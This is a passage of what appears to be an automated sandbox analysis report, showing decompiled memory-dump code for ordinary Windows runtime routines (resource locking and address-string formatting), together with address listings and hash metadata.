                                                                                                                                                                                    														_t63 = E0264F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                                                    														__eflags = _t63;
                                                                                                                                                                                    														if(__eflags >= 0) {
                                                                                                                                                                                    															L2:
                                                                                                                                                                                    															return _t63;
                                                                                                                                                                                    														} else {
                                                                                                                                                                                    															_push(_t63);
                                                                                                                                                                                    															E02693915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                                                                                                                                                    															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                                                    															_push( &_a4);
                                                                                                                                                                                    															_push(1);
                                                                                                                                                                                    															_t63 = E0264F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                                                    															__eflags = _t63;
                                                                                                                                                                                    															if(__eflags >= 0) {
                                                                                                                                                                                    																goto L2;
                                                                                                                                                                                    															} else {
                                                                                                                                                                                    																_push(_t63);
                                                                                                                                                                                    																_t66 = E02693915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                                                                                                                                                    																asm("int3");
                                                                                                                                                                                    																while(1) {
                                                                                                                                                                                    																	_t110 = _t66;
                                                                                                                                                                                    																	__eflags = _t66 - 1;
                                                                                                                                                                                    																	if(_t66 != 1) {
                                                                                                                                                                                    																		break;
                                                                                                                                                                                    																	}
                                                                                                                                                                                    																	_t128 = _t128 | 0xffffffff;
                                                                                                                                                                                    																	_t66 = _t110;
                                                                                                                                                                                    																	asm("lock cmpxchg [ebx], edi");
                                                                                                                                                                                    																	__eflags = _t66 - _t110;
                                                                                                                                                                                    																	if(_t66 != _t110) {
                                                                                                                                                                                    																		continue;
                                                                                                                                                                                    																	} else {
                                                                                                                                                                                    																		_t67 =  *[fs:0x18];
                                                                                                                                                                                    																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                                                                                                                                                    																		return _t67;
                                                                                                                                                                                    																	}
                                                                                                                                                                                    																	goto L59;
                                                                                                                                                                                    																}
                                                                                                                                                                                    																E02675329(_t110, _t138);
                                                                                                                                                                                    																_t69 = E026753A5(_t138, 1);
                                                                                                                                                                                    																return _t69;
                                                                                                                                                                                    															}
                                                                                                                                                                                    														}
                                                                                                                                                                                    													}
                                                                                                                                                                                    												}
                                                                                                                                                                                    											} else {
                                                                                                                                                                                    												_t56 =  *(_t96 + 0x28);
                                                                                                                                                                                    												goto L3;
                                                                                                                                                                                    											}
                                                                                                                                                                                    										} else {
                                                                                                                                                                                    											_t107 =  *_t119;
                                                                                                                                                                                    											__eflags = _t107;
                                                                                                                                                                                    											if(__eflags > 0) {
                                                                                                                                                                                    												while(1) {
                                                                                                                                                                                    													_t81 = _t107;
                                                                                                                                                                                    													asm("lock cmpxchg [edi], esi");
                                                                                                                                                                                    													__eflags = _t81 - _t107;
                                                                                                                                                                                    													if(_t81 == _t107) {
                                                                                                                                                                                    														break;
                                                                                                                                                                                    													}
                                                                                                                                                                                    													_t107 = _t81;
                                                                                                                                                                                    													__eflags = _t81;
                                                                                                                                                                                    													if(_t81 > 0) {
                                                                                                                                                                                    														continue;
                                                                                                                                                                                    													}
                                                                                                                                                                                    													break;
                                                                                                                                                                                    												}
                                                                                                                                                                                    												_t56 = _a4;
                                                                                                                                                                                    												__eflags = _t107;
                                                                                                                                                                                    											}
                                                                                                                                                                                    											if(__eflags != 0) {
                                                                                                                                                                                    												while(1) {
                                                                                                                                                                                    													L3:
                                                                                                                                                                                    													__eflags = _t56;
                                                                                                                                                                                    													if(_t56 != 0) {
                                                                                                                                                                                    														goto L32;
                                                                                                                                                                                    													}
                                                                                                                                                                                    													_t107 = _t107 | 0xffffffff;
                                                                                                                                                                                    													_t56 = 0;
                                                                                                                                                                                    													asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                    													__eflags = 0;
                                                                                                                                                                                    													if(0 != 0) {
                                                                                                                                                                                    														continue;
                                                                                                                                                                                    													} else {
                                                                                                                                                                                    														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                                                    														return 1;
                                                                                                                                                                                    													}
                                                                                                                                                                                    													goto L59;
                                                                                                                                                                                    												}
                                                                                                                                                                                    												continue;
                                                                                                                                                                                    											} else {
                                                                                                                                                                                    												goto L40;
                                                                                                                                                                                    											}
                                                                                                                                                                                    										}
                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									__eflags = 0;
                                                                                                                                                                                    									return 0;
                                                                                                                                                                                    								} else {
                                                                                                                                                                                    									_t115 =  *(_t96 + 0x28);
                                                                                                                                                                                    									continue;
                                                                                                                                                                                    								}
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_t106 =  *_t49;
                                                                                                                                                                                    								__eflags = _t106;
                                                                                                                                                                                    								if(__eflags > 0) {
                                                                                                                                                                                    									while(1) {
                                                                                                                                                                                    										_t93 = _t106;
                                                                                                                                                                                    										asm("lock cmpxchg [edi], esi");
                                                                                                                                                                                    										__eflags = _t93 - _t106;
                                                                                                                                                                                    										if(_t93 == _t106) {
                                                                                                                                                                                    											break;
                                                                                                                                                                                    										}
                                                                                                                                                                                    										_t106 = _t93;
                                                                                                                                                                                    										__eflags = _t93;
                                                                                                                                                                                    										if(_t93 > 0) {
                                                                                                                                                                                    											continue;
                                                                                                                                                                                    										}
                                                                                                                                                                                    										break;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									__eflags = _t106;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                    									continue;
                                                                                                                                                                                    								} else {
                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                    								}
                                                                                                                                                                                    							}
                                                                                                                                                                                    						}
                                                                                                                                                                                    						goto L59;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_t84 = _t115;
                                                                                                                                                                                    					asm("lock cmpxchg [esi], ecx");
                                                                                                                                                                                    					__eflags = _t84 - _t115;
                                                                                                                                                                                    					if(_t84 != _t115) {
                                                                                                                                                                                    						_t115 = _t84;
                                                                                                                                                                                    						goto L7;
                                                                                                                                                                                    					} else {
                                                                                                                                                                                    						return 1;
                                                                                                                                                                                    					}
                                                                                                                                                                                    				}
                                                                                                                                                                                    				L59:
                                                                                                                                                                                    			}




































                                                                                                                                                                                    0x0269055a
                                                                                                                                                                                    0x0269055d
                                                                                                                                                                                    0x02690563
                                                                                                                                                                                    0x02690566
                                                                                                                                                                                    0x026905d8
                                                                                                                                                                                    0x026905e2
                                                                                                                                                                                    0x026905e5
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026905e7
                                                                                                                                                                                    0x026905e7
                                                                                                                                                                                    0x026905ea
                                                                                                                                                                                    0x026905f3
                                                                                                                                                                                    0x026905f3
                                                                                                                                                                                    0x02690568
                                                                                                                                                                                    0x02690568
                                                                                                                                                                                    0x02690568
                                                                                                                                                                                    0x02690569
                                                                                                                                                                                    0x02690569
                                                                                                                                                                                    0x02690569
                                                                                                                                                                                    0x0269056b
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b217f
                                                                                                                                                                                    0x026b2183
                                                                                                                                                                                    0x026b225b
                                                                                                                                                                                    0x026b225f
                                                                                                                                                                                    0x026b2189
                                                                                                                                                                                    0x026b218c
                                                                                                                                                                                    0x026b218f
                                                                                                                                                                                    0x026b2194
                                                                                                                                                                                    0x026b2199
                                                                                                                                                                                    0x026b219d
                                                                                                                                                                                    0x026b21a0
                                                                                                                                                                                    0x026b21a2
                                                                                                                                                                                    0x026b21ce
                                                                                                                                                                                    0x026b21ce
                                                                                                                                                                                    0x026b21ce
                                                                                                                                                                                    0x026b21d0
                                                                                                                                                                                    0x026b21d6
                                                                                                                                                                                    0x026b21de
                                                                                                                                                                                    0x026b21e2
                                                                                                                                                                                    0x026b21e8
                                                                                                                                                                                    0x026b21e9
                                                                                                                                                                                    0x026b21ec
                                                                                                                                                                                    0x026b21f1
                                                                                                                                                                                    0x026b21f6
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b21f8
                                                                                                                                                                                    0x026b21fb
                                                                                                                                                                                    0x026b2206
                                                                                                                                                                                    0x026b220b
                                                                                                                                                                                    0x026b220c
                                                                                                                                                                                    0x026b2217
                                                                                                                                                                                    0x026b2226
                                                                                                                                                                                    0x026b222b
                                                                                                                                                                                    0x026b222c
                                                                                                                                                                                    0x026b222f
                                                                                                                                                                                    0x026b2232
                                                                                                                                                                                    0x026b2235
                                                                                                                                                                                    0x026b2235
                                                                                                                                                                                    0x026b223a
                                                                                                                                                                                    0x026b223f
                                                                                                                                                                                    0x026b2241
                                                                                                                                                                                    0x026b2243
                                                                                                                                                                                    0x026b2248
                                                                                                                                                                                    0x026b2248
                                                                                                                                                                                    0x026b224d
                                                                                                                                                                                    0x026b224f
                                                                                                                                                                                    0x026b2262
                                                                                                                                                                                    0x026b2263
                                                                                                                                                                                    0x026b2268
                                                                                                                                                                                    0x026b2269
                                                                                                                                                                                    0x026b2269
                                                                                                                                                                                    0x026b2269
                                                                                                                                                                                    0x026b226d
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b2276
                                                                                                                                                                                    0x026b2279
                                                                                                                                                                                    0x026b227e
                                                                                                                                                                                    0x026b2283
                                                                                                                                                                                    0x026b2287
                                                                                                                                                                                    0x026b228a
                                                                                                                                                                                    0x026b228d
                                                                                                                                                                                    0x026b228f
                                                                                                                                                                                    0x026b22bc
                                                                                                                                                                                    0x026b22bc
                                                                                                                                                                                    0x026b22bc
                                                                                                                                                                                    0x026b22be
                                                                                                                                                                                    0x026b22c4
                                                                                                                                                                                    0x026b22cc
                                                                                                                                                                                    0x026b22d0
                                                                                                                                                                                    0x026b22d6
                                                                                                                                                                                    0x026b22d7
                                                                                                                                                                                    0x026b22da
                                                                                                                                                                                    0x026b22df
                                                                                                                                                                                    0x026b22e4
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b22e6
                                                                                                                                                                                    0x026b22e9
                                                                                                                                                                                    0x026b22f4
                                                                                                                                                                                    0x026b22f9
                                                                                                                                                                                    0x026b22fa
                                                                                                                                                                                    0x026b2305
                                                                                                                                                                                    0x026b2314
                                                                                                                                                                                    0x026b2319
                                                                                                                                                                                    0x026b231a
                                                                                                                                                                                    0x026b231d
                                                                                                                                                                                    0x026b2320
                                                                                                                                                                                    0x026b2323
                                                                                                                                                                                    0x026b2323
                                                                                                                                                                                    0x026b2328
                                                                                                                                                                                    0x026b232d
                                                                                                                                                                                    0x026b232f
                                                                                                                                                                                    0x026b2331
                                                                                                                                                                                    0x026b2336
                                                                                                                                                                                    0x026b2336
                                                                                                                                                                                    0x026b233b
                                                                                                                                                                                    0x026b233d
                                                                                                                                                                                    0x026b2350
                                                                                                                                                                                    0x026b2351
                                                                                                                                                                                    0x026b2356
                                                                                                                                                                                    0x026b2359
                                                                                                                                                                                    0x026b2359
                                                                                                                                                                                    0x026b235b
                                                                                                                                                                                    0x026b235d
                                                                                                                                                                                    0x02675367
                                                                                                                                                                                    0x0267536b
                                                                                                                                                                                    0x02675372
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b2363
                                                                                                                                                                                    0x026b2363
                                                                                                                                                                                    0x026b2369
                                                                                                                                                                                    0x026b236a
                                                                                                                                                                                    0x026b236c
                                                                                                                                                                                    0x026b2371
                                                                                                                                                                                    0x026b2373
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b2379
                                                                                                                                                                                    0x026b2379
                                                                                                                                                                                    0x026b237a
                                                                                                                                                                                    0x026b237f
                                                                                                                                                                                    0x026b237f
                                                                                                                                                                                    0x026b2385
                                                                                                                                                                                    0x026b2386
                                                                                                                                                                                    0x026b2389
                                                                                                                                                                                    0x026b238e
                                                                                                                                                                                    0x026b2390
                                                                                                                                                                                    0x02675378
                                                                                                                                                                                    0x0267537c
                                                                                                                                                                                    0x026b2396
                                                                                                                                                                                    0x026b2396
                                                                                                                                                                                    0x026b2397
                                                                                                                                                                                    0x026b239c
                                                                                                                                                                                    0x026b23a2
                                                                                                                                                                                    0x026b23a3
                                                                                                                                                                                    0x026b23a6
                                                                                                                                                                                    0x026b23ab
                                                                                                                                                                                    0x026b23ad
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b23b3
                                                                                                                                                                                    0x026b23b3
                                                                                                                                                                                    0x026b23b4
                                                                                                                                                                                    0x026b23b9
                                                                                                                                                                                    0x026b23ba
                                                                                                                                                                                    0x026b23ba
                                                                                                                                                                                    0x026b23bc
                                                                                                                                                                                    0x026b23bf
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026a9153
                                                                                                                                                                                    0x026a9158
                                                                                                                                                                                    0x026a915a
                                                                                                                                                                                    0x026a915e
                                                                                                                                                                                    0x026a9160
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026a9166
                                                                                                                                                                                    0x026a9166
                                                                                                                                                                                    0x026a9171
                                                                                                                                                                                    0x026a9176
                                                                                                                                                                                    0x026a9176
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026a9160
                                                                                                                                                                                    0x026b23c6
                                                                                                                                                                                    0x026b23ce
                                                                                                                                                                                    0x026b23d7
                                                                                                                                                                                    0x026b23d7
                                                                                                                                                                                    0x026b23ad
                                                                                                                                                                                    0x026b2390
                                                                                                                                                                                    0x026b2373
                                                                                                                                                                                    0x026b233f
                                                                                                                                                                                    0x026b233f
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b233f
                                                                                                                                                                                    0x026b2291
                                                                                                                                                                                    0x026b2291
                                                                                                                                                                                    0x026b2293
                                                                                                                                                                                    0x026b2295
                                                                                                                                                                                    0x026b229a
                                                                                                                                                                                    0x026b22a1
                                                                                                                                                                                    0x026b22a3
                                                                                                                                                                                    0x026b22a7
                                                                                                                                                                                    0x026b22a9
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b22ab
                                                                                                                                                                                    0x026b22ad
                                                                                                                                                                                    0x026b22af
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b22af
                                                                                                                                                                                    0x026b22b1
                                                                                                                                                                                    0x026b22b4
                                                                                                                                                                                    0x026b22b4
                                                                                                                                                                                    0x026b22b6
                                                                                                                                                                                    0x026753be
                                                                                                                                                                                    0x026753be
                                                                                                                                                                                    0x026753be
                                                                                                                                                                                    0x026753c0
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026753cb
                                                                                                                                                                                    0x026753ce
                                                                                                                                                                                    0x026753d0
                                                                                                                                                                                    0x026753d4
                                                                                                                                                                                    0x026753d6
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026753d8
                                                                                                                                                                                    0x026753e3
                                                                                                                                                                                    0x026753ea
                                                                                                                                                                                    0x026753ea
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026753d6
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b22b6
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b228f
                                                                                                                                                                                    0x026b2349
                                                                                                                                                                                    0x026b234d
                                                                                                                                                                                    0x026b2251
                                                                                                                                                                                    0x026b2251
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b2251
                                                                                                                                                                                    0x026b21a4
                                                                                                                                                                                    0x026b21a4
                                                                                                                                                                                    0x026b21a6
                                                                                                                                                                                    0x026b21a8
                                                                                                                                                                                    0x026b21ac
                                                                                                                                                                                    0x026b21b6
                                                                                                                                                                                    0x026b21b8
                                                                                                                                                                                    0x026b21bc
                                                                                                                                                                                    0x026b21be
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b21c0
                                                                                                                                                                                    0x026b21c2
                                                                                                                                                                                    0x026b21c4
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b21c4
                                                                                                                                                                                    0x026b21c6
                                                                                                                                                                                    0x026b21c6
                                                                                                                                                                                    0x026b21c8
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b21c8
                                                                                                                                                                                    0x026b21a2
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b2183
                                                                                                                                                                                    0x0269057b
                                                                                                                                                                                    0x0269057d
                                                                                                                                                                                    0x02690581
                                                                                                                                                                                    0x02690583
                                                                                                                                                                                    0x026b2178
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02690589
                                                                                                                                                                                    0x0269058f
                                                                                                                                                                                    0x0269058f
                                                                                                                                                                                    0x02690583
                                                                                                                                                                                    0x00000000

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 026B2206
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.2361587097.0000000002640000.00000040.00000001.sdmp, Offset: 02630000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.2361574580.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362039928.0000000002720000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362066586.0000000002730000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362087025.0000000002734000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362111006.0000000002737000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362129389.0000000002740000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362314296.00000000027A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                    • API String ID: 885266447-4236105082
                                                                                                                                                                                    • Opcode ID: 8e8d43b35e7bff23bb0890526fd5fd2195d8f52681381e51e00a1ccd035c4a2d
                                                                                                                                                                                    • Instruction ID: c735efbb3980d5a8c5dc972365d1695104f3b1f2cac2d5dd7fdec5a4aedafb2b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e8d43b35e7bff23bb0890526fd5fd2195d8f52681381e51e00a1ccd035c4a2d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 30510A71B002116FEB16CE14DCD1FA633EAAF94714F21426DED55DB385DA31EC828B94
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                                                    			E026914C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                    				char _v10;
                                                                                                                                                                                    				char _v140;
                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                    				signed int _t24;
                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                    				signed int _t34;
                                                                                                                                                                                    				signed int _t40;
                                                                                                                                                                                    				intOrPtr _t45;
                                                                                                                                                                                    				void* _t51;
                                                                                                                                                                                    				intOrPtr* _t52;
                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                    				signed int _t57;
                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t51 = __edx;
                                                                                                                                                                                    				_t24 =  *0x2732088; // 0x7774a876
                                                                                                                                                                                    				_v8 = _t24 ^ _t57;
                                                                                                                                                                                    				_t45 = _a16;
                                                                                                                                                                                    				_t53 = _a4;
                                                                                                                                                                                    				_t52 = _a20;
                                                                                                                                                                                    				if(_a4 == 0 || _t52 == 0) {
                                                                                                                                                                                    					L10:
                                                                                                                                                                                    					_t26 = 0xc000000d;
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					if(_t45 == 0) {
                                                                                                                                                                                    						if( *_t52 == _t45) {
                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							goto L10;
                                                                                                                                                                                    						}
                                                                                                                                                                                    					} else {
                                                                                                                                                                                    						L3:
                                                                                                                                                                                    						_t28 =  &_v140;
                                                                                                                                                                                    						if(_a12 != 0) {
                                                                                                                                                                                    							_push("[");
                                                                                                                                                                                    							_push(0x41);
                                                                                                                                                                                    							_push( &_v140);
                                                                                                                                                                                    							_t29 = E02687707();
                                                                                                                                                                                    							_t58 = _t58 + 0xc;
                                                                                                                                                                                    							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t54 = E026913CB(_t53, _t28);
                                                                                                                                                                                    						if(_a8 != 0) {
                                                                                                                                                                                    							_t34 = E02687707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                                                                                                                                    							_t58 = _t58 + 0x10;
                                                                                                                                                                                    							_t54 = _t54 + _t34 * 2;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						if(_a12 != 0) {
                                                                                                                                                                                    							_t40 = E02687707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                                                                                                                                    							_t58 = _t58 + 0x10;
                                                                                                                                                                                    							_t54 = _t54 + _t40 * 2;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                                                                                                                                    						 *_t52 = _t53;
                                                                                                                                                                                    						if( *_t52 < _t53) {
                                                                                                                                                                                    							goto L10;
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							E02652340(_t45,  &_v140, _t53 + _t53);
                                                                                                                                                                                    							_t26 = 0;
                                                                                                                                                                                    						}
                                                                                                                                                                                    					}
                                                                                                                                                                                    				}
                                                                                                                                                                                    				return E0265E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                                                                                                                                    			}




















                                                                                                                                                                                    0x026914c0
                                                                                                                                                                                    0x026914cb
                                                                                                                                                                                    0x026914d2
                                                                                                                                                                                    0x026914d6
                                                                                                                                                                                    0x026914da
                                                                                                                                                                                    0x026914de
                                                                                                                                                                                    0x026914e3
                                                                                                                                                                                    0x0269157a
                                                                                                                                                                                    0x0269157a
                                                                                                                                                                                    0x026914f1
                                                                                                                                                                                    0x026914f3
                                                                                                                                                                                    0x026bea0f
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026bea15
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026bea15
                                                                                                                                                                                    0x026914f9
                                                                                                                                                                                    0x026914f9
                                                                                                                                                                                    0x026914fe
                                                                                                                                                                                    0x02691504
                                                                                                                                                                                    0x026bea1a
                                                                                                                                                                                    0x026bea1f
                                                                                                                                                                                    0x026bea21
                                                                                                                                                                                    0x026bea22
                                                                                                                                                                                    0x026bea27
                                                                                                                                                                                    0x026bea2a
                                                                                                                                                                                    0x026bea2a
                                                                                                                                                                                    0x02691515
                                                                                                                                                                                    0x02691517
                                                                                                                                                                                    0x0269156d
                                                                                                                                                                                    0x02691572
                                                                                                                                                                                    0x02691575
                                                                                                                                                                                    0x02691575
                                                                                                                                                                                    0x0269151e
                                                                                                                                                                                    0x026bea50
                                                                                                                                                                                    0x026bea55
                                                                                                                                                                                    0x026bea58
                                                                                                                                                                                    0x026bea58
                                                                                                                                                                                    0x0269152e
                                                                                                                                                                                    0x02691531
                                                                                                                                                                                    0x02691533
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02691535
                                                                                                                                                                                    0x02691541
                                                                                                                                                                                    0x02691549
                                                                                                                                                                                    0x02691549
                                                                                                                                                                                    0x02691533
                                                                                                                                                                                    0x026914f3
                                                                                                                                                                                    0x02691559

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 026BEA22
                                                                                                                                                                                      • Part of subcall function 026913CB: ___swprintf_l.LIBCMT ref: 0269146B
                                                                                                                                                                                      • Part of subcall function 026913CB: ___swprintf_l.LIBCMT ref: 02691490
                                                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 0269156D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.2361587097.0000000002640000.00000040.00000001.sdmp, Offset: 02630000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.2361574580.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362039928.0000000002720000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362066586.0000000002730000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362087025.0000000002734000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362111006.0000000002737000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362129389.0000000002740000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362314296.00000000027A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                                                    • String ID: %%%u$]:%u
                                                                                                                                                                                    • API String ID: 48624451-3050659472
                                                                                                                                                                                    • Opcode ID: f8dfa19b4ecaafd68bc9713dac91416a7ceb4a9f902a30f1008905a52291c29b
                                                                                                                                                                                    • Instruction ID: 540a19cc544cce86541bd01fb708624f3d369a42cd8f287d0a25aeaef759009d
                                                                                                                                                                                    • Opcode Fuzzy Hash: f8dfa19b4ecaafd68bc9713dac91416a7ceb4a9f902a30f1008905a52291c29b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3321D5B290062A9BDF21EE54CC40AEE73BCAF11704F558596EC4AD3240DF71EA59CBE1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 45%
                                                                                                                                                                                    			E026753A5(signed int _a4, char _a8) {
                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                    				signed int _t32;
                                                                                                                                                                                    				signed int _t37;
                                                                                                                                                                                    				signed int _t40;
                                                                                                                                                                                    				signed int _t42;
                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                    				intOrPtr _t46;
                                                                                                                                                                                    				void* _t48;
                                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                                    				void* _t51;
                                                                                                                                                                                    				signed int _t57;
                                                                                                                                                                                    				signed int _t64;
                                                                                                                                                                                    				signed int _t71;
                                                                                                                                                                                    				void* _t74;
                                                                                                                                                                                    				intOrPtr _t78;
                                                                                                                                                                                    				signed int* _t79;
                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                    				signed int _t86;
                                                                                                                                                                                    				signed int _t92;
                                                                                                                                                                                    				void* _t104;
                                                                                                                                                                                    				void* _t105;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t64 = _a4;
                                                                                                                                                                                    				_t32 =  *(_t64 + 0x28);
                                                                                                                                                                                    				_t71 = _t64 + 0x28;
                                                                                                                                                                                    				_push(_t92);
                                                                                                                                                                                    				if(_t32 < 0) {
                                                                                                                                                                                    					_t78 =  *[fs:0x18];
                                                                                                                                                                                    					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                                                                                                                                    					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                                                                                                                                    						goto L3;
                                                                                                                                                                                    					} else {
                                                                                                                                                                                    						__eflags = _t32 | 0xffffffff;
                                                                                                                                                                                    						asm("lock xadd [ecx], eax");
                                                                                                                                                                                    						return 1;
                                                                                                                                                                                    					}
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					L3:
                                                                                                                                                                                    					_push(_t86);
                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                    						L4:
                                                                                                                                                                                    						__eflags = _t32;
                                                                                                                                                                                    						if(_t32 == 0) {
                                                                                                                                                                                    							break;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						__eflags = _a8;
                                                                                                                                                                                    						if(_a8 == 0) {
                                                                                                                                                                                    							__eflags = 0;
                                                                                                                                                                                    							return 0;
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                                                                                                                                    							_t79 = _t64 + 0x24;
                                                                                                                                                                                    							_t71 = 1;
